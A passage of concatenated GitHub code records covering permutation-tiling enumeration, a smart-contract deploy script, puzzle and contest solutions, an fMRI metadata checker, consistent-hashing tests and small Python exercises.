yielded.\n \"\"\"\n queue = deque(\n chain(\n self.tiling.cells_in_col(start[0]), self.tiling.cells_in_row(start[1])\n )\n )\n visited = set([start])\n while queue:\n cell = queue.popleft()\n if cell not in visited:\n yield cell\n visited.add(cell)\n queue.extend(self.tiling.cells_in_row(cell[1]))\n queue.extend(self.tiling.cells_in_col(cell[0]))\n\n def _visted_cells_aligned(self, cell, visited):\n \"\"\"\n Return the cells that are in visited and in the same row or column as\n `cell`.\n \"\"\"\n row_cells = self.tiling.cells_in_row(cell[1])\n col_cells = self.tiling.cells_in_col(cell[0])\n return (c for c in visited if (c in row_cells or c in col_cells))\n\n def get_genf(self, **kwargs) -> Any:\n # pylint: disable=too-many-locals\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n if self.tiling.extra_parameters:\n raise NotImplementedError(\n \"Not implemented monotone verified with extra parameters.\"\n )\n try:\n start = next(\n c\n for c in self.tiling.active_cells\n if not self.tiling.is_monotone_cell(c)\n )\n except StopIteration:\n start = next(iter(self.tiling.active_cells))\n start_basis = self.tiling.cell_basis()[start][0]\n start_reqs = [[p] for p in self.tiling.cell_basis()[start][1]]\n start_tiling = self.tiling.from_perms(\n obstructions=start_basis, requirements=start_reqs\n )\n start_gf = start_tiling.get_genf()\n F = start_gf.subs({x: x * self._cell_variable(start)})\n visited = set([start])\n for cell in self._cell_tree_traversal(start):\n interleaving_cells = self._visted_cells_aligned(cell, visited)\n substitutions = {\n scv: 
scv * self._tracking_var\n for scv in map(self._cell_variable, interleaving_cells)\n }\n F_tracked = F.subs(substitutions)\n minlen, maxlen = self._cell_num_point(cell)\n if maxlen is None:\n F = self._interleave_any_length(F_tracked, cell)\n if minlen > 0:\n F -= self._interleave_fixed_lengths(F_tracked, cell, 0, minlen - 1)\n else:\n F = self._interleave_fixed_lengths(F_tracked, cell, minlen, maxlen)\n visited.add(cell)\n F = simplify(\n F.subs({v: 1 for v in F.free_symbols if v != x})\n ) # type: ignore[operator]\n # A simple test to warn us if the code is wrong\n if __debug__:\n lhs = taylor_expand(F, n=6)\n rhs = [len(list(self.tiling.objects_of_size(i))) for i in range(7)]\n assert lhs == rhs, f\"Bad genf\\n{lhs}\\n{rhs}\"\n return F\n\n @staticmethod\n def _cell_variable(cell):\n \"\"\"\n Return the appropriate variable to track the number of point in the\n given cell.\n \"\"\"\n return var(f\"y_{cell[0]}_{cell[1]}\")\n\n def _interleave_any_length(self, F, cell):\n \"\"\"\n Return the generating function for interleaving any number of point of\n a monotone sequence into the region tracked by\n `MonotoneTreeEnumeration._tracking_var` in `F`.\n A variable is added to track the number of point in cell.\n \"\"\"\n cell_var = self._cell_variable(cell)\n gap_filler = 1 / (1 - x * cell_var)\n return F.subs({self._tracking_var: gap_filler}) * gap_filler\n\n def _interleave_fixed_lengths(self, F, cell, min_length, max_length):\n \"\"\"\n Return the generating function for interleaving between min_point and\n max_point (both included) number of point of\n a monotone sequence into the region tracked by\n `MonotoneTreeEnumeration._tracking_var` in `F`.\n A variable is added to track the number of point in cell.\n \"\"\"\n return sum(\n self._interleave_fixed_length(F, cell, i)\n for i in range(min_length, max_length + 1)\n )\n\n def _interleave_fixed_length(self, F, cell, num_point):\n \"\"\"\n Return the generating function for interleaving num_point\n number of point of a monotone sequence into the region tracked by\n `MonotoneTreeEnumeration._tracking_var` in `F`.\n A variable is added to track the number of point in cell.\n \"\"\"\n new_genf = self._tracking_var**num_point * F\n for i in range(1, num_point + 1):\n new_genf = diff(new_genf, self._tracking_var) / i\n new_genf *= self._cell_variable(cell) ** num_point\n new_genf *= x**num_point\n return new_genf.subs({self._tracking_var: 1})\n\n def _cell_num_point(self, cell):\n \"\"\"\n Return a pair of integer `(min, max)` that describe the possible\n number of point in the cell. 
If the number of point is unbounded,\n `max` is None.\n\n We assume that the cell is monotone\n \"\"\"\n obs, reqs = self.tiling.cell_basis()[cell]\n ob_lens = sorted(map(len, obs))\n assert ob_lens[0] == 2, \"Unexpected obstruction\"\n assert len(reqs) <= 1, \"Unexpected number of requirement\"\n if len(obs) == 1:\n maxlen = None\n elif len(obs) == 2:\n maxlen = ob_lens[1] - 1\n else:\n raise RuntimeError(\"Unexpected number of obstructions\")\n if not reqs:\n minlen = 0\n elif len(reqs) == 1:\n minlen = len(reqs[0])\n else:\n raise RuntimeError(\"Unexpected number of requirements\")\n return minlen, maxlen\n\n\nclass DatabaseEnumeration(Enumeration):\n \"\"\"\n Enumeration strategy for a tilings that are in the database.\n\n There is not always a specification for a tiling in the database but you can always\n find the generating function and the minimal polynomial in the database.\n \"\"\"\n\n API_ROOT_URL = \"https://api.permpal.com\"\n all_verified_tilings: FrozenSet[bytes] = frozenset()\n num_verified_request = 0\n\n @classmethod\n def load_verified_tiling(cls):\n \"\"\"\n Load all the verified tiling in the attribute `all_verified_tilings` of\n the class.\n\n That speeds up the verification test.\n \"\"\"\n if not DatabaseEnumeration.all_verified_tilings:\n uri = f\"{cls.API_ROOT_URL}/all_verified_tilings\"\n response = requests.get(uri, timeout=10)\n response.raise_for_status()\n compressed_tilings = map(bytes.fromhex, response.json())\n cls.all_verified_tilings = frozenset(compressed_tilings)\n\n def _get_tiling_entry(self):\n \"\"\"\n Retrieve the tiling entry from the database. Returns None if the tiling\n is not in the database.\n \"\"\"\n key = self.tiling.to_bytes().hex()\n search_url = f\"{DatabaseEnumeration.API_ROOT_URL}/verified_tiling/key/{key}\"\n r = requests.get(search_url, timeout=10)\n if r.status_code == 404:\n return None\n r.raise_for_status()\n return r.json()\n\n def verified(self):\n \"\"\"\n Check if a tiling is verified.\n\n After a 100 checks it loads all the saved tiling from the database to\n speed up future requests.\n \"\"\"\n DatabaseEnumeration.num_verified_request += 1\n if DatabaseEnumeration.all_verified_tilings:\n return self.tiling.to_bytes() in DatabaseEnumeration.all_verified_tilings\n if DatabaseEnumeration.num_verified_request > 10:\n DatabaseEnumeration.load_verified_tiling()\n return self._get_tiling_entry() is not None\n\n def get_genf(self, **kwargs) -> Any:\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n return sympify(self._get_tiling_entry()[\"genf\"])\n","repo_name":"PermutaTriangle/Tilings","sub_path":"tilings/algorithms/enumeration.py","file_name":"enumeration.py","file_ext":"py","file_size_in_byte":14317,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"32380297932","text":"from brownie import *\nimport os\n\ndef deploy_backedby(deployer):\n from0 = {'from': deployer}\n profiles = BBProfiles.deploy(from0)\n posts = BBPosts.deploy(profiles, from0)\n tiers = BBTiers.deploy(profiles, from0)\n subfactory = BBSubscriptionsFactory.deploy(profiles, tiers, deployer, from0)\n\n gasOracle = DebugGasOracle.deploy(from0)\n subfactory.setGasOracle(gasOracle, from0).wait(2)\n \n tokens = [\n {'name': \"USDC\", 'address': \"0x8f7116CA03AEB48547d0E2EdD3Faa73bfB232538\"},\n {'name': \"USDT\", 'address': \"0x0afF29eeCf746EC239C8DA3E8e630F46FCaBC48e\"},\n {'name': \"DAI\", 'address': \"0xd393b1E02dA9831Ff419e22eA105aAe4c47E1253\"},\n {'name': \"TUSD\", 'address': \"0x3c75bd0e659b8bd426b3b9a1d93b75bb9c97de10\"}\n ]\n\n for i, token in enumerate(tokens):\n tx = subfactory.deploySubscriptions(token['address'], from0)\n tx.wait(2)\n token['subaddress'] = subfactory.getDeployedSubscriptions(token['address'])\n #remove gas change for live\n #subfactory.setSubscriptionFee(token['address'], 1, from0)\n\n print(\"profiles\", profiles)\n print(\"posts\", posts)\n print(\"tiers\", tiers)\n print(\"subfactory\", subfactory)\n print(\"gas oracle\", gasOracle)\n\n \n for i, token in enumerate(tokens):\n print(token['name'], token['address'], \"=>\", token['subaddress'])\n\n\ndef main():\n \n if(os.environ.get(\"DEPLOYER_PRIVATEKEY\") != None):\n deployer = accounts.add(os.environ.get(\"DEPLOYER_PRIVATEKEY\"))\n elif(len(accounts) > 0):\n deployer = accounts[0]\n\n if(deployer.balance() >= 1e17):\n deploy_backedby(deployer)","repo_name":"backedby/v1-contracts","sub_path":"scripts/josh/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"39241896127","text":"from math import log10\nfrom time import time\n\ndef main():\n Ln, n, a, b = 1000, 3, 2, 0\n for i in range(2, Ln+1):\n n, a = n + 2*a, n + a\n if int(log10(n)) > int(log10(a)): \n b += 1\n return b\n\nif __name__==\"__main__\":\n start = time()\n print(f\"\\nAnswer: { main() }\")\n print(f\"Time Taken: { time() - start }\\n\")\n\n \n","repo_name":"fermihacker/Project-Euler","sub_path":"Python/Problem057.py","file_name":"Problem057.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"30421383437","text":"from collections import deque\n\nN,M = map(int,input().split())\n\ngraph = []\n\nfor i in range(N):\n k = list(input())\n for j in range(M):\n if k[j] == 'B':\n b = [i,j]\n if k[j] == 'R':\n r = [i,j]\n graph.append(k)\n\n\nvisited = [[[[False]*M for i in range(N)] for i in range(M) ] for i in range(N)]\n\ndef move(x,y,dx,dy):\n c = 0\n\n while graph[x+dx][y+dy] != '#' and graph[x][y] != 'O':\n x +=dx\n y +=dy\n c+=1\n return x,y,c \n\n\ndef bfs():\n dx = [1,-1,0,0]\n dy = [0,0,1,-1]\n q = deque()\n q.append((r[0],r[1],b[0],b[1],1))\n visited[r[0]][r[1]][b[0]][b[1]] = True\n\n while q:\n rx,ry,bx,by,cnt = q.popleft()\n if cnt > 10 :\n break\n \n for i in range(4):\n nrx,nry,rc = move(rx,ry,dx[i],dy[i])\n nbx,nby,bc = move(bx,by,dx[i],dy[i])\n if graph[nbx][nby] != 'O':\n if graph[nrx][nry] == 'O':\n print(1)\n return \n if nrx == nbx and nry == nby :\n if rc > bc :\n nrx -=dx[i]\n nry -=dy[i]\n else:\n nbx -=dx[i]\n nby -=dy[i]\n if visited[nrx][nry][nbx][nby] == False:\n visited[nrx][nry][nbx][nby] = True\n q.append((nrx,nry,nbx,nby,cnt+1))\n \n print(0)\n return \n\nbfs()\n\n \n","repo_name":"JunHyungJang/codingtest","sub_path":"Baekjoon/graphs/13459.py","file_name":"13459.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4475884207","text":"# PURPOSE\n# This file reads a json template file and constructs a dictionary of\n# field-value pairs. When passed a relevant fidelity file, it compares the\n# empirical field values in it against this dictionary and returns which tests\n# it passed and which it failed\n# Author: Austin Marcus (axm6053@psu.edu)\n\n# Assumptions being made:\n##Questionable:\n## The target json sub-elemnt name should exactly match oart of the file name\n#\t# however, this may be inconsistent. Best match is with the SeriesDescription element\n## a \"-\" in json fields is equivalent to a \"_\" --> should remove this assumption. made because of mismatch with SeriesDescription.\n#\n##Valid:\n## values from json template that are a single element vector (e.g. [5]) are equivalent to the single element (data from experimental json files is not bracketed) --> valid\n## if a list (dim or pixdim) is longer in the experimental data than the list given in the template json, only look at up till the length of the template list\n\nimport json\nimport os\nimport sys\nfrom . import helper\n\nTOL = .01\nmanual_verify = False\n\n# this class organizes the data associated with a single file analysis: a comparison of a single file against the json template file\nclass fileAnalysis:\n\n\tdef __init__(self, filename, fileSuffix, task, scanType, subID, runNum, fidelityChecks):\n\t\tself.filename = filename # the filename, not the path\n\t\tself.fileSuffix = fileSuffix # the suffix of the file (json or nii)\n\t\tself.task = task # the task done during the scan. (rest_post, ...)\n\t\tself.scanType = scanType # the type of scan done. (bold or sbref)\n\t\tself.subID = subID\n\t\tself.fidelityChecks = fidelityChecks # array of fidelity_check objects\n\t\tself.runNum = runNum # run number for the current task\n\t\n\t# INPUT:\n\t#\tother: a fileAnalysis object\n\t# OUTPUT:\n\t#\tTrue if the only thing different between this fileAnalysis and the other is their file suffix. 
that is, they represent the same scan, just one is the nifti file and the other is the json file\n\t#\tFalse otherwise\n\tdef sameScan(self, other):\n\t\tif self.task == other.task and self.scanType == other.scanType and self.subID == other.subID and helper.getUpperPathFromPath(self.filename) == helper.getUpperPathFromPath(other.filename) and self.runNum == other.runNum:\n\t\t\treturn True\n\t\treturn False\n\n\tdef print(self):\n\t\tprint(\"Scan type: \" + self.task + \"\\nFile type: \" + self.scanType + \"\\nFile suffix: \" + self.fileSuffix + \"\\nSubject Id: \" + str(self.subID) + \"\\nRun number\" + str(self.runNum))\n\t\tprint(\"\\t\" + str(self.fidelityChecks))\n\t\tprint()\n\n# fed an experimental json file and compares against values\nclass fidelityTemplate:\n\t\n\tdef __init__(self, jsonFileName):\n\t\t#print(\"in fidelityTemplate\")\n\t\tf = open(jsonFileName, \"r\")\n\n\t\t# convert raw json to dictionary\n\t\tself.data = json.load(f)\n\t\tfor dict1 in self.data:\n\t\t\tfor key1 in self.data[dict1]:\n\t\t\t\tfor key2 in self.data[dict1][key1]:\n\t\t\t\t\tself.data[dict1][key1][key2] = self.interpret(self.data[dict1][key1][key2])\n\t\n\t# takes as input a string, and attempts to convert it to a number\n\t# if given a list with one element, will break it out of the list as well\n\tdef interpret(self, data):\n\n\t\tif type(data) == list and len(data) == 1: # breaks out single element list\n\t\t\tdata = data[0]\n\t\t\n\t\tif type(data) == list:\n\t\t\t# iterate on each\n\t\t\tfor i in range(len(data)):\n\t\t\t\tdata[i] = self._interpret(data[i])\n\n\t\telse: # just do it once\n\t\t\tdata = self._interpret(data)\n\n\t\treturn data\n\n\tdef _interpret(self, data):\n\t\ttry: # tries to convert to number\n\t\t\tdata = float(data)\n\t\texcept: \n\t\t\t#data = data.replace(\"-\",\"_\") # assuming it must be a string at this point if not a number\n\t\t\tpass\n\n\t\treturn data\n\t\t\n\t# decides how to get data from given file\n\tdef getExData(self, exFileName, fileSuffix):\n\t\t# select wether comparing to json file or nifti file \n\t\tif fileSuffix == \"json\":\n\t\t\t\n\t\t\tf = open(exFileName, \"r\")\n\t\t\texData = json.load(f)\n\n\t\telif fileSuffix == \"nifti\": \n\t\t\texData = {}\n\t\t\traw = os.popen(\"fslhd \" + str(exFileName)).read()\n\t\t\tfor line in raw.split(\"\\n\"):\n\t\t\t\tline = line.split(\"\\t\")\n\t\t\t\tlineParts = list(filter(lambda x: x != \"\\t\" and x != \"\", line))\n\t\t\t\tif len(lineParts) != 2:\n\t\t\t\t\tcontinue\n\t\n\t\t\t\tlineParts[1] = self.interpret(lineParts[1])\n\t\t\n\t\t\t\t# consider aggregating specific fields into array to match format of desired json\n\t\t\t\tspecs = [\"dim\", \"pixdim\"]\n\t\t\t\tmatched = False\n\t\t\t\tfor i in specs:\n\t\t\t\t\tif i == lineParts[0][:len(i)]: #match\n\t\t\t\t\t\tmatched = True\n\t\t\t\t\t\t# if first one, initialize\n\t\t\t\t\t\tif exData.get(i) == None:\n\t\t\t\t\t\t\texData[i] = []\n\t\t\t\t\t\texData[i].append(lineParts[1])\n\t\t\t\t\t\t\t\n\t\t\t\tif not matched:\n\t\t\t\t\texData[lineParts[0]] = lineParts[1]\n\n\t\treturn exData\n\n\t# returns the scan type (rest_pre, rest_post) by extraction from filename\n\t# returns file type (json or nifti) by checking file suffix\n\t# returns subject ID number\n \t # return run number from filename\n\tdef parseFileName(self, filename):\n\t\tsubID = helper.getSubjectIdOfPath(filename)\n\t\ttask = helper.getTaskFromFilename(filename)\n\t\trunNum = helper.getRunNumberFromFilename(filename)\n\t\tif task == \"T1w\":\n\t\t\tscanType = 
\"---\"\n\t\telse:\n\t\t\tscanType = helper.getScanType(filename)\n\t\tfileSuffix = helper.getFileSuffix(filename)\n\t\t\n\t\treturn task, fileSuffix, subID, scanType, runNum\n\n\tdef guessIsKey(self, key, guess):\n\t\tkey_mod = key.replace('_', '').replace('-', '').lower()\n\t\tguess = guess.replace('_', '').replace('-', '').lower()\n\n\t\treturn key_mod == guess\n\n\tdef isTaskInTemplate(self, task):\n\t\t# check if task is specified in template file\n\t\ttry:\n\t\t\tself.data[task]\n\t\t\treturn True\n\t\texcept:\n\t\t\tfor key in list(self.data.keys()):\n\t\t\t\tif self.guessIsKey(key, task):\n\t\t\t\t\treturn key\n\t\t\treturn False\n\n\t# pass file name to compare object. \n\t# checks that target fields match fields in the data file\n\t# returns a 3-tuple: (task, subID, output)\n\t# \t\toutput: array of 2-tuples: (field, [0,1])\n\tdef compareToFile(self, exFileName):\n\t\t# parse filename to get scan and file type\n\t\ttask, fileSuffix, subID, scanType, runNum = self.parseFileName(exFileName)\n\t\tif task == None:\n\t\t\treturn None\n\n\t\tret = self.isTaskInTemplate(task)\n\t\tif ret == False:\n\t\t\treturn None\n\t\telif ret != True:\n\t\t\ttask = ret\n\t\n\t\t# task name in template file has _sbref for sbref files\n\t\tif scanType == \"sbref\":\n\t\t\ttaskTemp = task + \"_sbref\"\n\t\telse:\n\t\t\ttaskTemp = task\n\n\t\t# get the data from the file\n\t\texData = self.getExData(exFileName, fileSuffix)\n\t\t# select which set of fidelity checks applies to this file\n\t\tchecks = self.data[taskTemp][fileSuffix]\n\t\t\n\t\toutput = []\n\t\tif (manual_verify):\n\t\t\tprint(\"file: \" + exFileName)\n\t\tfor key in checks: # attempting to check only based on fields present in template file; assumption that data files should have a superset\n\t\t\tif (manual_verify):\n\t\t\t\tprint(\"key: \" + key + \"\\n\\ttemplt: \" + str(checks[key]) + \"\\n\\tactual: \", end=\"\")\n\t\t\tcur_check = helper.fidelity_check(key)\n\t\t\t# check if key in data file\n\t\t\ttry:\n\t\t\t\texData[key]\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(exData[key], end=\"\\n\")\n\t\t\texcept:\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(\"not present\", end=\"\\n\")\n\t\t\t\tcur_check.failCheck(str(checks[key]) + helper.fidelity_check.diff_delim + str(\"not present\"))\n\t\t\t\toutput.append(cur_check)\n\t\t\t\tcontinue\n\n\t\t\tequal, indicies = self.compareObjects(exData[key], checks[key])\n\t\t\tif equal:\n\t\t\t\tcur_check.passCheck()\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(\"\\t0\", end=\"\")\n\t\t\telse:\n\t\t\t\t# if it differed by an element in a list, pass the index\n\t\t\t\tif indicies != None:\n\t\t\t\t\t# build string: \"/@:...\"\n\t\t\t\t\tresult = \"\"\n\t\t\t\t\tfor i in indicies:\n\t\t\t\t\t\tresult += (\"%s%s%s%s%d\" % (str(checks[key][i]), helper.fidelity_check.diff_delim, str(exData[key][i]), helper.fidelity_check.addr_char, i))\n\t\t\t\t\t\tresult += \":\"\n\t\t\t\t\tresult = result[:-1]\n\n\t\t\t\t\tcur_check.failCheck(result)\n\t\t\t\telse:\n\t\t\t\t\tcur_check.failCheck(str(checks[key]) + helper.fidelity_check.diff_delim + str(exData[key]))\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(\"\\t1\", end=\"\")\n\n\t\t\tif (manual_verify):\n\t\t\t\tprint()\n\t\t\toutput.append(cur_check)\n\n\t\tif (manual_verify):\n\t\t\tprint()\n\n\t\t# sort output by key name to ensure consistency\n\t\toutput = sorted(output, key=lambda x: x.getName()) \n\t\treturn fileAnalysis(exFileName, fileSuffix, task, scanType, subID,runNum, output)\n\n\t# assuming objects have been interpreted at this point\n\t# 
takes two objects, that is, a piece of text, a number, or an array of either and tests their equality\n\t# these objects are the values of the fields from the template json and the experimental data\n\tdef compareObjects(self, exOb, templateOb):\n\n\t\t# compare each element of a list\n\t\tif type(exOb) == list and type(templateOb) == list:\n\t\t\tindicies = []\n\t\t\tfor i in range(len(templateOb)):\n\t\t\t\tif self._compareObjects(exOb[i], templateOb[i]) == False:\n\t\t\t\t\tindicies.append(i)\n\t\t\n\t\t\tif len(indicies) == 0:\n\t\t\t\treturn (True, None)\n\t\t\telse:\n\t\t\t\treturn (False, indicies)\n\t\t\t\n\t\telif type(exOb) == list or type(templateOb) == list:\n\t\t\treturn (False, None)\n\t\telse:\n\t\t\treturn (self._compareObjects(exOb, templateOb), None)\n\n\tdef _num_in_tol(self, num1, num2):\n\t\treturn num1 < num2 + TOL and num1 > num2 - TOL\n\n\tdef _compareObjects(self, exOb, templateOb):\n\n\t\tif type(templateOb) == str and type(exOb) != str:\n\t\t\t# get number in template object\n\t\t\tnum = float(templateOb[:-1])\n\t\t\tif templateOb[-1] == \"+\":\n\t\t\t\tif self._num_in_tol(num, exOb) or num < exOb:\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\treturn False\n\t\telif type(templateOb) == str and type(exOb) == str:\n\t\t\tif exOb == templateOb:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn exOb.replace(\"-\",\"_\") == templateOb.replace(\"-\",\"_\")\n\t\telse:\n\t\t\treturn self._num_in_tol(exOb, templateOb)\n\t\t\t\t\n","repo_name":"UNCDEPENdLab/fmriprep_pipeline","sub_path":"mri_fidelity_checks/mri_fidelity_checks/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":9525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"20546713552","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('9958E83F5A6C4B6D30.jpg', 0)\n\nprint(img.shape)\n\nx, y = img.shape\n\nprint(x)\nprint(y)\n\n_x = 64\n_y = 64\nk = 0\n\n# 이미지 하나씩 자르기\nfor i in range(0, y, _y):\n for j in range(0, x, _x):\n k = k + 1\n if k == 5:\n testimg = img[i:i+_x, j:j+_y]\n cv2.imshow('testimage',testimg)\n\n\n\n\ncv2.imshow('image',img)\ncv2.waitKey(0)","repo_name":"donaldaq/opencv","sub_path":"codes/cropped.py","file_name":"cropped.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27389979402","text":"from collections import Counter\nfrom statistics import mean\n\nfrom consistent_hash import ConsistentHash, Node\nfrom faker import Faker\n\n\ndef test_get_node_of_key_successfully():\n # given\n consistent_hash = ConsistentHash(\n nodes=[\n Node(id=\"1\"),\n Node(id=\"2\"),\n Node(id=\"3\"),\n ],\n )\n faker = Faker()\n\n n_data = 10\n for _ in range(n_data):\n\n # when\n key = faker.email()\n node = consistent_hash.get_node_of_key(key)\n\n # then\n assert node.id in [\"1\", \"2\", \"3\"]\n\n\ndef test_get_node_of_key_should_divide_the_keys_evenly():\n # given\n nodes = [\n Node(id=\"1\"),\n Node(id=\"2\"),\n Node(id=\"3\"),\n ]\n consistent_hash = ConsistentHash(nodes=nodes)\n faker = Faker()\n node_ids = []\n\n # when\n n_data_per_node = 100\n n_data = n_data_per_node * len(nodes)\n for _ in range(n_data):\n key = faker.email()\n node = consistent_hash.get_node_of_key(key)\n node_ids.append(node.id)\n\n # then\n counter = Counter(node_ids)\n print(counter)\n error_rate = 0.20\n lower_bound = n_data_per_node - int(n_data_per_node * error_rate)\n upper_bound = n_data_per_node + int(n_data_per_node * error_rate)\n expected_values = list(range(lower_bound, upper_bound))\n assert counter[\"1\"] in expected_values\n assert counter[\"2\"] in expected_values\n assert counter[\"3\"] in expected_values\n\n\ndef test_consistent_hash_do_after_add_a_node_successfully():\n n_test = 100\n n_diffs = []\n faker = Faker()\n n_data = 100\n initial_data = [faker.email() for _ in range(n_data)]\n n_nodes = 3\n nodes = [Node(id=str(i)) for i in range(1, n_nodes + 1)]\n for _ in range(n_test):\n consistent_hash = ConsistentHash(nodes)\n initial_key_to_node = {}\n for key in initial_data:\n node = consistent_hash.get_node_of_key(key)\n initial_key_to_node[key] = node\n\n consistent_hash.add_node(Node(id=\"4\"))\n after_key_to_node = {}\n for key in initial_data:\n node = consistent_hash.get_node_of_key(key)\n after_key_to_node[key] = node\n\n n_diff = 0\n for key in initial_data:\n if initial_key_to_node[key] != after_key_to_node[key]:\n n_diff += 1\n n_diffs.append(n_diff)\n\n error_rate = 0.35\n expected_diff = int(len(initial_data) / 4)\n lower_bound = expected_diff - int(expected_diff * error_rate)\n upper_bound = expected_diff + int(expected_diff * error_rate)\n expected_values = list(range(lower_bound, upper_bound))\n assert int(mean(n_diffs)) in expected_values\n","repo_name":"heumsi/implementing-system-design-interview","sub_path":"05-design-consistent-hashing/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"5144811998","text":"# when writing a function you can define a default value\r\n# if an argument for a parameter is provided in the functional call python uses the argument value\r\n\r\ndef describe_pet( pet_name, animal_type = \"dog\"):\r\n \"\"\"Display information about a pet\"\"\"\r\n print(\"\\nI have a \" + animal_type + \".\")\r\n print(\"My \" + animal_type + \"'s name is \" + pet_name.title() + \".\")\r\n\r\ndescribe_pet(pet_name= \"wes\")\r\ndescribe_pet(animal_type= \"turtle\", pet_name= \"terry the turtle\") # in order to change animal_type it first must ...\r\n# ... be defined","repo_name":"JamCrumpet/Lesson-notes","sub_path":"Lesson 7 function/7.8_default_values.py","file_name":"7.8_default_values.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9530466881","text":"\nfrom multiprocessing import Pool\n\np = Pool(4)\n\n#make local directories if they don't exist\ndef make_dir(directory):\n\tif not os.path.exists(directory):\n\t\tos.makedirs(directory)\n\n#get all subdirs\n\nimport os, glob\nsrcdir = \"xml\"\ndstdir = \"/media/backup/aps/xml/\"\n\nsrcfolders = []\nfor root, dirs, files in os.walk(srcdir):\n\t#make folder copies at the destination so they exist\n\tsrcfolders.extend(dirs)\n\tbreak\n\nfor f in srcfolders[0]:\n\tnewroot = dstdir + f\n\t#make_dir(newroot)\n\tdstpattern = \"xml/\" + f + \"/*.xml\"\n\tsource_files = glob.glob(dstpattern)\n\tdest_files = [i.replace(srcdir+\"/\", dstdir) for i in source_files]\n\t\n\n#for each directory, copyfile in parallel \np.map(f, args=(srcfolders, dstfolders))\n","repo_name":"mjlavin80/aps-elastic-scripts","sub_path":"copy-json.py","file_name":"copy-json.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5371398706","text":"# 키로거\n# https://www.acmicpc.net/problem/5397\n# Stack 2개 이용\n\n\ndef getKey(s):\n beforeCursor = []\n afterCursor = []\n for token in s:\n if token == '>':\n if afterCursor:\n beforeCursor.append(afterCursor.pop())\n elif token == '<':\n if beforeCursor:\n afterCursor.append(beforeCursor.pop())\n elif token == '-':\n if beforeCursor:\n beforeCursor.pop()\n else:\n beforeCursor.append(token)\n return \"\".join(beforeCursor) + \"\".join(reversed(afterCursor))\n\n\ntestCaseNum = int(input())\n\nfor _ in range(testCaseNum):\n s = input()\n key = getKey(s)\n print(key)\n","repo_name":"YimJiYoung/Daily-DataStructure-Algorithm","sub_path":"DataStructure/Stack_Queue/키로거.py","file_name":"키로거.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20159703720","text":"with open(\"7/rules.txt\") as f:\n rules = f.readlines()\n\n\ndef get_containers(color: str):\n res = []\n for rule in rules:\n if color in rule:\n rule = rule.strip().split(\" \")\n res.append(rule[0] + \" \" + rule[1])\n return res\n\n\n# def check(color: str):\n# result = list(set(get_containers(color)))\n# print(\"Res: \", result)\n# if len(result) == 0:\n# return 0\n# else:\n# num = 0\n# for res in result:\n# if res == color:\n# num -= 1\n# continue\n# num += check(res)\n# return len(result) + num\n\ndef check(color: str):\n print(\"Color: \", color)\n result = list(set(get_containers(color)))\n result.remove(color)\n print(\"Result: \", result)\n\n if len(result) < 1:\n return []\n\n temp = []\n for res in result:\n temp.extend(set(check(res)))\n result.extend(temp)\n return list(set(result))\n\n\nres = check(\"shiny gold\")\nprint(\"Result: \", len(res))\n","repo_name":"vaerl/advent-of-code-2020","sub_path":"7/rules-1.py","file_name":"rules-1.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"5062810333","text":"#!/usr/bin/env python3\nimport sys\n\n\ndef solve(N: int, M: int, C: \"List[str]\", D: \"List[str]\", P: \"List[int]\"):\n d = {}\n for i in range(M):\n d[D[i]] = P[i + 1]\n ans = 0\n for cc in C:\n if cc not in d:\n ans += P[0]\n else:\n ans += d[cc]\n print(ans)\n\n return\n\n\n# Generated by 2.12.0 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n M = int(next(tokens)) # type: int\n C = [next(tokens) for _ in range(N)] # type: \"List[str]\"\n D = [next(tokens) for _ in range(M)] # type: \"List[str]\"\n P = [int(next(tokens)) for _ in range(M + 1)] # type: \"List[int]\"\n solve(N, M, C, D, P)\n\nif __name__ == '__main__':\n main()\n","repo_name":"K53/atcoder-workspace","sub_path":"abc308/B/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
